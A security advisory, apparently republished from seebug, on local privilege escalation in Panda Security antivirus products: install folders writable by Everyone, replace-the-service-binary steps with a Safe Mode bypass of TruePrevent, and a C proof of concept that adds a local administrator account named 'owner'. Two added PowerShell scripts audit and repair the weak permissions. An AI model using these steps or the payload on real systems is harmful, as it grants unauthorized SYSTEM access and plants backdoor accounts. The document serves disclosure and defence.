Panda Security Local Privilege Escalation

12 Jan 2010 00:00:00 | Reported by Root | Type: seebug | Source: www.seebug.org

Panda Security privilege escalation via service manipulation


Description:
============

1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During installation of Panda Security for Desktops/File Servers the
permissions on the installation folder

%ProgramFiles%\Panda Software\AVTC\

are by default set to Everyone:Full Control. Several services
(e.g. PAVSRV51.EXE) are started from this folder, and they run under
the LocalSystem account.

The 32-bit version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.

If the TruePrevent service (Panda TPSrv) is not running, the files are
completely unprotected.

A normal user cannot stop the service, but can normally boot the
workstation into Safe Mode (SafeBoot), in which TPSrv is not started
and all service files can be manipulated.

This can be exploited as follows:

    a. Boot the PC into Safe Mode by pressing F8 during the boot
       process
    b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot the trojaned application is executed under the LocalSystem
account.

Executables started as services:
+------------------------------
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe
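The condition described above (a service running as LocalSystem whose
binary, or the folder holding it, is writable by Everyone) is easy to
find on any Windows box, and the list of Panda binaries is only one
instance of it. The following PowerShell script is an added example and
is not code from this advisory or from Panda: it enumerates every
service that runs as LocalSystem, parses the binary path out of the
service command line, reports write-class ACEs granted to Everyone,
Users, Authenticated Users or INTERACTIVE on the binary and on its
directory, and notes whether the service is registered to start in Safe
Mode (the reason TPSrv is absent there). The principal list and the
rights mask are this example's assumptions; run it from an elevated
prompt.

```powershell
# Added example, not part of the original advisory: audit every service that
# runs as LocalSystem and report any ACE that lets Everyone, Users,
# Authenticated Users or INTERACTIVE write to the service binary or to the
# directory it lives in. Generic for any vendor; run from an elevated
# PowerShell session. The principal list and rights mask are this example's
# policy choices, not something the advisory states.

$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow replacing the binary: create/append data (on a directory:
# create files/subfolders), delete, delete children, change permissions,
# take ownership. Read/execute bits are deliberately excluded so that the
# normal Users:RX grant on Program Files is not reported.
$FSR = [System.Security.AccessControl.FileSystemRights]
$WriteMask = [int]($FSR::WriteData -bor $FSR::AppendData -bor
                   $FSR::DeleteSubdirectoriesAndFiles -bor $FSR::Delete -bor
                   $FSR::ChangePermissions -bor $FSR::TakeOwnership)

# Extract the executable from Win32_Service.PathName, which may be quoted
# and may carry arguments (e.g. svchost.exe -k netsvcs).
function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    # Unquoted: take everything up to the first ".exe" token
    $m = [regex]::Match($p, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split '\s+')[0]
}

# Return the Allow ACEs on $Path that give a weak principal write-class rights.
function Get-WeakAces {
    param([string]$Path)
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $WeakPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $WriteMask) -ne 0
    }
}

# A service only starts in Safe Mode if it (or its load-order group) is
# listed under SafeBoot\Minimal or SafeBoot\Network. This checks the service
# name only, not group registration. A protection service that is absent
# here is exactly what the advisory's Safe Mode step relies on.
function Test-SafeBootStart {
    param([string]$ServiceName)
    foreach ($mode in 'Minimal', 'Network') {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\$mode\$ServiceName"
        if (Test-Path -LiteralPath $key) { return $true }
    }
    return $false
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if ($svc.StartName -ne 'LocalSystem') { continue }
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
    # Check both the file and its parent directory: the rename-and-replace
    # steps in the advisory only need write access to the directory.
    foreach ($target in @((Split-Path -Parent $exe), $exe)) {
        try { $weak = Get-WeakAces -Path $target } catch { continue }
        foreach ($ace in $weak) {
            [pscustomobject]@{
                Service          = $svc.Name
                Path             = $target
                Principal        = $ace.IdentityReference.Value
                Rights           = $ace.FileSystemRights
                StartsInSafeMode = Test-SafeBootStart -ServiceName $svc.Name
            }
        }
    }
}

$findings | Sort-Object Service, Path | Format-Table -AutoSize
```

On a box with a default Panda install the output lists each Panda
service twice (directory and file) with Principal "Everyone" and Rights
"FullControl". Any row for a service that also shows StartsInSafeMode
False for the product's protection service means the Safe Mode bypass
described above applies as well.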


2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During installation of Panda Security for Desktops/File Servers the
permissions on the installation folder

%ProgramFiles%\Panda Software\AVTC\

are by default set to Everyone:Full Control. Several services
(e.g. PavSrvx86.EXE) are started from this folder, and they run under
the LocalSystem account.

The 64-bit version of Panda Security for Desktops/File Servers does not
ship the TruePrevent package that protects the files in the
installation directory from manipulation.

The service files are therefore not protected at all. An unprivileged
user can replace a service executable with a file of his choice and
obtain full access with LocalSystem privileges.

This can be exploited as follows:

    a. Rename PavSrvX86.exe to PavSrvX86.old in the Panda folder
    b. Copy any application to PavSrvX86.exe
    c. Reboot

Upon reboot the trojaned application is executed under the LocalSystem
account.

Executables started as services:
+------------------------------
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe
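Because the 64-bit build has no TruePrevent service, the directory ACL
is the only thing between a standard user and LocalSystem, so the fix
is to correct that ACL. The following PowerShell/icacls sequence is an
added example and is not from this advisory or from the vendor: it backs
up the current ACL, replaces the Everyone:Full Control grant on the
install folder with the permissions Program Files normally carries
(SYSTEM and Administrators full control, Users read and execute), pushes
them down to existing files, and verifies that nothing in the tree still
names the Everyone SID. The permission set and the path are this
example's assumptions; the advisory lists the 64-bit binaries under
"Program Files (x86)\PANDA SOFTWARE\AVNT", so point $InstallDir there
on such a box, and re-check after vendor updates, which may reapply
their own ACL.

```powershell
# Added example, not part of the original advisory: strip the
# Everyone:Full Control grant from the Panda install folder and give it
# the standard Program Files permissions instead. Run elevated.
# $InstallDir is an assumption taken from the advisory's 32-bit path.

$InstallDir = Join-Path $env:ProgramFiles 'Panda Software\AVTC'
$Backup     = Join-Path $env:TEMP 'panda-acl-backup.txt'

if (-not (Test-Path -LiteralPath $InstallDir)) {
    throw "Install directory not found: $InstallDir"
}

# 1. Save the current ACLs of the whole tree so the change can be undone
#    later with:  icacls <parent-of-InstallDir> /restore <backup file>
icacls "$InstallDir" /save "$Backup" /T /C | Out-Null

# 2. On the folder itself: stop inheriting (/inheritance:r), drop the
#    explicit Everyone grant (*S-1-1-0 is the Everyone SID, locale
#    independent), then grant an explicit set. (OI)(CI) makes each ACE
#    propagate to child files and folders.
icacls "$InstallDir" /inheritance:r /remove:g *S-1-1-0 `
    /grant:r 'NT AUTHORITY\SYSTEM:(OI)(CI)F' `
             'BUILTIN\Administrators:(OI)(CI)F' `
             'BUILTIN\Users:(OI)(CI)RX' | Out-Null

# 3. Reset every existing child to the inherited ACL so that explicit
#    Everyone grants the installer put on individual files disappear too.
icacls "$InstallDir\*" /reset /T /C | Out-Null

# 4. Verify: /findsid reports every object whose ACL still names the SID.
$left = icacls "$InstallDir" /findsid *S-1-1-0 /T /C |
    Select-String -SimpleMatch 'SID Found'

if ($left) {
    Write-Warning "Everyone is still referenced on:`n$($left -join "`n")"
} else {
    Write-Host "OK: no ACE for Everyone left under $InstallDir"
}
```

After this a standard user can still read and run the binaries, which
is all the product needs, but can no longer rename or overwrite them,
so the replace-and-reboot steps above fail with "Access is denied".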


3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------

During installation of the Panda Security 20XX products the
permissions on the installation folder

%ProgramFiles%\panda security\panda <product>\

are by default set to Everyone:Full Control. Several services
(e.g. PAVSRV51.EXE) are started from this folder, and they run under
the LocalSystem account.

These products install the TruePrevent package by default, which
protects the files in the installation directory from manipulation.

If the TruePrevent service (Panda TPSrv) is not running, the files are
completely unprotected.

A normal user cannot stop the service, but can normally boot the
workstation into Safe Mode (SafeBoot), in which TPSrv is not started
and all service files can be manipulated.

This can be exploited as follows:

    a. Boot the PC into Safe Mode by pressing F8 during the boot
       process
    b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot the trojaned application is executed under the LocalSystem
account.

Executables started as services:
+------------------------------
%ProgramFiles%\panda security\panda <product>\firewall\PSHOST.EXE
%ProgramFiles%\Panda Security\Panda <product>\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda <product>\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda <product>\PskSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda <product>\TPSrv.exe


4. Panda Antivirus for Netbooks
+------------------------------

During installation of Panda Antivirus for Netbooks the
permissions on the installation folder

%ProgramFiles%\panda security\Panda Antivirus for Netbooks\

are by default set to Everyone:Full Control. Several services
(e.g. PAVSRV51.EXE) are started from this folder, and they run under
the LocalSystem account.

This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.

If the TruePrevent service (Panda TPSrv) is not running, the files are
completely unprotected.

A normal user cannot stop the service, but can normally boot the
workstation into Safe Mode (SafeBoot), in which TPSrv is not started
and all service files can be manipulated.

This can be exploited as follows:

    a. Boot the PC into Safe Mode by pressing F8 during the boot
       process
    b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot the trojaned application is executed under the LocalSystem
account.

This product was not patched like the other 2010 products, so the
following previously reported vulnerability still exists:

http://www.securityfocus.com/bid/36897

TruePrevent bypass: it can be bypassed through the "Open" dialog of the
"Quarantine" -> "Add file" functionality.

Executables started as services:
+------------------------------
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe



Proof of Concept :
==================

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Compile this and copy it over one of the service executables listed
 * above (e.g. PAVSRV51.exe). When the service starts on the next boot the
 * binary runs as LocalSystem and creates a local administrator account.
 */
INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ 2 * _MAX_PATH ];

    /* Locate net.exe via %WINDIR% instead of trusting the service's PATH */
    if ( GetEnvironmentVariableA( "WINDIR", szWinDir, _MAX_PATH ) == 0 )
    {
        printf( "WINDIR is not set\n" );
        return 1;
    }

    printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

    wsprintfA( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add",
               szWinDir );
    system( szCmdLine );

    printf( "Adding user \"owner\" to the local Administrators group...\n" );

    wsprintfA( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add",
               szWinDir );
    system( szCmdLine );

    return 0;
}

                              
